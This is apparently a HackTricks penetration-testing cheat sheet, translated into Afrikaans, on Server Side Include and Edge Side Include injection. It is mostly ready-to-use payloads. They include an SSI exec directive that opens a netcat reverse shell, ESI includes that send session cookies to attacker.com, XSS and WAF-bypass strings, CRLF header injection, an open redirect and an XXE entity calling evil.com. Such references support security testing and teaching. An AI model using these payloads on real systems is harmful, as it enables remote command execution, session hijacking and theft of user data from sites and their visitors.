Server Side Inclusion/Edge Side Inclusion Injection

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Server Side Inclusion Basiese Inligting

(Inleiding geneem uit Apache docs)

SSI (Server Side Includes) is riglyne wat in HTML-bladsye geplaas word, en op die bediener geëvalueer word terwyl die bladsye bedien word. Dit laat jou toe om dynamies gegenereerde inhoud by 'n bestaande HTML-bladsy te voeg, sonder om die hele bladsy via 'n CGI-program of ander dinamiese tegnologie te bedien. Byvoorbeeld, jy mag 'n riglyn in 'n bestaande HTML-bladsy plaas, soos:

<!--#echo var="DATE_LOCAL" -->

En, wanneer die bladsy bedien word, sal hierdie fragment geëvalueer word en met sy waarde vervang word:

Dinsdag, 15-Jan-2013 19:28:54 EST

Die besluit oor wanneer om SSI te gebruik, en wanneer om jou bladsy heeltemal deur 'n program te laat genereer, is gewoonlik 'n kwessie van hoeveel van die bladsy staties is, en hoeveel elke keer herbereken moet word wanneer die bladsy bedien word. SSI is 'n uitstekende manier om klein stukke inligting by te voeg, soos die huidige tyd - hierbo getoon. Maar as 'n meerderheid van jou bladsy teen die tyd dat dit bedien word, gegenereer word, moet jy na 'n ander oplossing soek.

Jy kan die teenwoordigheid van SSI aflei as die webtoepassing lêers met die uitbreidings ** .shtml, .shtm of .stm** gebruik, maar dit is nie die enigste geval nie.

'n Tipiese SSI-uitdrukking het die volgende formaat:

<!--#directive param="value" -->

Kontrole

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

Edge Side Inclusion

Daar is 'n probleem met die kasinligting of dinamiese toepassings aangesien die inhoud vir die volgende keer wat die inhoud opgehaal word, verskillend mag wees. Dit is wat ESI gebruik word, om aan te dui met ESI-tags die dinamiese inhoud wat gegenereer moet word voordat die kasweergawe gestuur word. As 'n aanvaller in staat is om 'n ESI-tag binne die kasinhoud te injekteer, kan hy in staat wees om arbitraire inhoud op die dokument in te dien voordat dit aan die gebruikers gestuur word.

ESI Detection

Die volgende kop in 'n antwoord van die bediener beteken dat die bediener ESI gebruik:

Surrogate-Control: content="ESI/1.0"

As jy hierdie kop nie kan vind nie, kan die bediener dalk steeds ESI gebruik. 'n blindeksploitasi benadering kan ook gebruik word aangesien 'n versoek na die aanvallers bediener moet aankom:

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

ESI-uitbuiting

GoSecure het geskep 'n tabel om moontlike aanvalle te verstaan wat ons teen verskillende ESI-ondersteunde sagteware kan probeer, afhangende van die funksionaliteit wat ondersteun word:

  • Includes: Ondersteun die <esi:includes> riglyn

  • Vars: Ondersteun die <esi:vars> riglyn. Nuttig om XSS-filters te omseil

  • Cookie: Dokumentkoekies is beskikbaar vir die ESI-enjin

  • Opwaartse Koppe Vereis: Surrogaat toepassings sal nie ESI-verklarings verwerk nie tensy die opwaartse toepassing die koppe verskaf

  • Gasheer Toegelaatlys: In hierdie geval is ESI-includes slegs moontlik vanaf toegelate bediener-gashere, wat SSRF, byvoorbeeld, slegs teen daardie gashere moontlik maak

Sagteware

Includes

Vars

Koekies

Opwaartse Koppe Vereis

Gasheer Witlys

Squid3

Ja

Ja

Ja

Ja

Nee

Varnish Cache

Ja

Nee

Nee

Ja

Ja

Fastly

Ja

Nee

Nee

Nee

Ja

Akamai ESI Toetsbediener (ETS)

Ja

Ja

Ja

Nee

Nee

NodeJS esi

Ja

Ja

Ja

Nee

Nee

NodeJS nodesi

Ja

Nee

Nee

Nee

Opsioneel

XSS

Die volgende ESI-riglyn sal 'n arbitrêre lêer binne die antwoord van die bediener laai

<esi:include src=http://attacker.com/xss.html>

Om kliente XSS-beskerming te omseil

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

Steel Koekie

  • Afgeleë steel koekie

<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
  • Steal cookie HTTP_ONLY met XSS deur dit in die antwoord te reflekteer:

# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions

Private Local File

Moet dit nie verwar met 'n "Local File Inclusion":

<esi:include src="secret.txt">

CRLF

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

Die volgende sal 'n Location kop aan die antwoord voeg

<!--esi $add_header('Location','http://attacker.com') -->

Voeg Kop

  • Voeg kop in gedwonge versoek

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
  • Voeg 'n kop in die antwoord by (nuttig om "Content-Type: text/json" in 'n antwoord met XSS te omseil)

<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value

CRLF in Add header (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

Akamai debug

Dit sal foutopsporingsinligting wat in die antwoord ingesluit is, stuur:

<esi:debug/>

ESI + XSLT = XXE

Deur die xslt waarde vir die dca parameter te spesifiseer, is dit haalbaar om eXtensible Stylesheet Language Transformations (XSLT) gebaseerde ESI in te sluit. Die insluiting veroorsaak dat die HTTP surrogaat die XML en XSLT lêers ophaal, met laasgenoemde wat die eerste filter. Sulke XML lêers is uitbuitbaar vir XML External Entity (XXE) aanvalle, wat aanvallers in staat stel om SSRF aanvalle uit te voer. Die nut van hierdie benadering is egter beperk aangesien ESI reeds as 'n SSRF-vak gebruik word. Vanweë die afwesigheid van ondersteuning in die onderliggende Xalan biblioteek, word eksterne DTD's nie verwerk nie, wat plaaslike lêeruittrekking voorkom.

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XSLT-lêer:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

Check die XSLT-bladsy:

XSLT Server Side Injection (Extensible Stylesheet Language Transformations)

Verwysings

Brute-Force Opsporing Lys

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Last updated